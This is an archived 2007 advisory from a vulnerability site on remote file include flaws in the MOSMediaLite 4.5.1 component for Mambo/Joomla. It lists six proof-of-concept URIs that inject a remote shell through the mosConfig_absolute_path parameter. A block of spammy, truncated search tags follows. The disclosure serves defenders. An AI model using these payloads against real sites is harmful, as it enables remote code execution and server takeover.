about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Mambo/Joomla MOSMediaLite MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities


Title Mambo/Joomla MOSMediaLite MosConfig_Absolute_Path Multiple Remote File Include Vulnerabilities
Published 2007-10-08-12:00AM
Updated 2007-10-09-10:48PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  k1n9k0ng is credited with the discovery of this vulnerability.
Vulnerable  MOSMediaLite MOSMediaLite 4.5.1
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available:http://www.example.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell]
http://www.example.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell]
http://www.example.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell]
http://www.example.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell]
http://www.example.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell]
http://www.example.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:45:05 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
thirisha b pinkworld. 200 /compo PHP 4.4.2 Sexyworld senaga cilia croz a.sebang45 Zeroboard- 200 /compo Sex.waalpa CMS is Fre Morai phpbb sql kushbu blog.sina. Jayamalini news for c www.dzpk.o news for c indonesia HINDI MOV ubuntu+ber www.segou1 Mujeres de joomla rem blogbugs.r sajtzaupoz a.qvod123. www.shuang Www.sex300 news for c wwwsaxe.co www.010jdn apache tom remote ker TAMILSEX.C wwwsaxe.co 2101 4image Mulher pel a5.selunta 200 /compo www.world www.x-zhan 2.6.21 exp indean sax MyWebServe magic.galr free-zz.cn